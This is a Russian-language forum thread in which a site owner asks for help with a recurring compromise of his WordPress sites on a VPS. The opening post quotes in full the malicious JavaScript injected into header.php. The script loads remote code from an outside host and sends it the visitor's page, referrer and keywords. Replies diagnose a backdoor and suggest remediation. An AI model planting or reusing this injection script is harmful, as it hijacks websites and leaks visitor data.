Перейти к содержимому








Фотография
Нужна помощь

Проблема на хостинге



  • Авторизуйтесь для ответа в теме
Сообщений в теме: 15

#1 cotopes

cotopes
  • Platinum
  • Сообщений: 398
  • Регистрация: 13.01.2014
  • Заработано: 133 руб.
Репутация: 231

Награды: 25

  
  
  
  
  
  
  
  

Отправлено 04 Декабрь 2016 - 19:12

Вообщем есть несколько сайтов, но в последнее время на хостинге в каждый сайт в файл header.php вставляют скрипт:

 

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://www.itatscc.com/web210/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Что я только не делал: удалял, следил, подключал анивирус-но каждые 2 часа вставляется в файл этот скрипт. Даже переустановка сайта и смена паролей, перенос на другой хостинг-не помогли.

 

Также на сайтах добавляются файлы типа: wp-december.php, test.php, zc56j.php, wp-timers.php, global.php, proxy71.php и файлы с окончанием .suspected

 

Посоветуйте, что лучше сделать и как избавиться от этой заразы?

 

 

 

 

 

 

 


  • 0

#2 WinRAR.rar

WinRAR.rar

    Отец Сливапа

  • Администратор
  • Сообщений: 6 342
  • Регистрация: 02.10.2013
  • Заработано: 313 руб.
Репутация: 974

Награды: 35

  
  
  
  
  
  
  
  

Отправлено 04 Декабрь 2016 - 19:16

Похоже на шелл. Все рут пароли сменили?

При переустановке сайта заливали свежий wp или со старыми файлами?


  • 0

#3 cotopes

cotopes
  • Platinum
  • Сообщений: 398
  • Регистрация: 13.01.2014
  • Заработано: 133 руб.
Репутация: 231

Награды: 25

  
  
  
  
  
  
  
  

Отправлено 04 Декабрь 2016 - 19:20

Похоже на шелл. Все рут пароли сменили?

При переустановке сайта заливали свежий wp или со старыми файлами?

Да, пароль рут меняли

при переустановке заливал свежую версию wp


  • 0

#4 WinRAR.rar

WinRAR.rar

    Отец Сливапа

  • Администратор
  • Сообщений: 6 342
  • Регистрация: 02.10.2013
  • Заработано: 313 руб.
Репутация: 974

Награды: 35

  
  
  
  
  
  
  
  

Отправлено 04 Декабрь 2016 - 19:22

Насколько вижу подобный бэкдор не только у вас

Погуглив вот что нашел 

https://forum.drweb....028#entry806936

 

Код встраивает на страницу бекдор с рекламой, и запоминает в куках, чтобы второй раз не показывать вредоносный код или трафик накручивает себе по определенным UTM меткам и собирает статистику ключей.

 

Короче надо срочно чистить


  • 0

#5 Gott

Gott
  • Сливапер LVL 5
  • Сообщений: 644
  • Регистрация: 05.08.2014
  • Заработано: 82 руб.
Репутация: 240

Награды: 19

  
  
  
  
  
  
  
  

Отправлено 04 Декабрь 2016 - 19:22

Заплатить антивирусному спецу. Всегда так делаю. Удалять заразу и переносить сайт на другой хост нет смысла - если хацкер уже в него залез то залезет ещё раз. Надо искать уязвимости и фиксить. 


  • 1

#6 cotopes

cotopes
  • Platinum
  • Сообщений: 398
  • Регистрация: 13.01.2014
  • Заработано: 133 руб.
Репутация: 231

Награды: 25

  
  
  
  
  
  
  
  

Отправлено 04 Декабрь 2016 - 19:30

Вот спустя 2 часа в только что созданном сайте, в котором кроме index.php нет больше файлов, появляются следующие файлы:

ISP-manager:

https://yadi.sk/i/XuuQzcVg32CqjG


Может подключить к онлайн-антивирусу?

 

virusdie-вирус находит, удаляет, но когда вставляют новый скрипт-сидит, молчит


  • 0

#7 inkosav

inkosav
  • Сливапер LVL 4
  • Сообщений: 111
  • Регистрация: 14.02.2014
  • Заработано: 0 руб.
Репутация: 84

Награды: 13

  
  
  
  
  
  
  
  

Отправлено 04 Декабрь 2016 - 19:33

А защитные плагины стоят? Wordfence или ITheme Security?


  • 0

#8 cotopes

cotopes
  • Platinum
  • Сообщений: 398
  • Регистрация: 13.01.2014
  • Заработано: 133 руб.
Репутация: 231

Награды: 25

  
  
  
  
  
  
  
  

Отправлено 04 Декабрь 2016 - 19:40

А защитные плагины стоят? Wordfence или ITheme Security?

нет, сейчас попробую установить


  • 0

#9 cotopes

cotopes
  • Platinum
  • Сообщений: 398
  • Регистрация: 13.01.2014
  • Заработано: 133 руб.
Репутация: 231

Награды: 25

  
  
  
  
  
  
  
  

Отправлено 04 Декабрь 2016 - 20:09

Не помогло, после установке плагина, спустя 10 минут опять появился скрипт.


  • 0

#10 openssource

openssource
  • Сливапер LVL 5
  • Сообщений: 79
  • Регистрация: 17.10.2013
  • Заработано: 6 руб.
Репутация: 102

Награды: 14

  
  
  
  
  
  
  
  

Отправлено 05 Декабрь 2016 - 00:55

Покажите список всех плагинов, которые установлены.


  • 0

#11 cotopes

cotopes
  • Platinum
  • Сообщений: 398
  • Регистрация: 13.01.2014
  • Заработано: 133 руб.
Репутация: 231

Награды: 25

  
  
  
  
  
  
  
  

Отправлено 05 Декабрь 2016 - 04:38

Покажите список всех плагинов, которые установлены.

Вот: https://yadi.sk/i/IznIDA1v32EdSm


  • 0

#12 egonick

egonick
  • Premium
  • Сообщений: 4
  • Регистрация: 06.10.2016
  • Заработано: 0 руб.
Репутация: 1

Награды: 12

  
  
  
  
  
  
  
  

Отправлено 05 Декабрь 2016 - 14:42

Shared хостинг или ВПС? А как ставите WP? Скачивание с официального сайта или через установщик, через панельку?
  • 0

#13 cotopes

cotopes
  • Platinum
  • Сообщений: 398
  • Регистрация: 13.01.2014
  • Заработано: 133 руб.
Репутация: 231

Награды: 25

  
  
  
  
  
  
  
  

Отправлено 05 Декабрь 2016 - 19:21

Shared хостинг или ВПС? А как ставите WP? Скачивание с официального сайта или через установщик, через панельку?

 

 

ВПС, скачиваю через официальный сайт, загружаю через ISP-manager и устанавливаю


  • 0

#14 openssource

openssource
  • Сливапер LVL 5
  • Сообщений: 79
  • Регистрация: 17.10.2013
  • Заработано: 6 руб.
Репутация: 102

Награды: 14

  
  
  
  
  
  
  
  

Отправлено 06 Декабрь 2016 - 14:24

Скинь свои контакты в ЛС, есть одна догадка, интересно будет проверить.


  • 0

#15 inkosav

inkosav
  • Сливапер LVL 4
  • Сообщений: 111
  • Регистрация: 14.02.2014
  • Заработано: 0 руб.
Репутация: 84

Награды: 13

  
  
  
  
  
  
  
  

Отправлено 06 Декабрь 2016 - 14:43

Заплатить антивирусному спецу. Всегда так делаю. Удалять заразу и переносить сайт на другой хост нет смысла - если хацкер уже в него залез то залезет ещё раз. Надо искать уязвимости и фиксить. 

если перенести на другой хостинг/сервак - можно проверить идею о том, что взлом идет через хостера или криво настроенный сервер


  • 0



Похожие темы Collapse

  Название темы Форум Автор Статистика Последнее сообщение

Количество пользователей, читающих эту тему: 2

0 пользователей, 2 гостей, 0 анонимных

×

Зарегистрируйся моментально!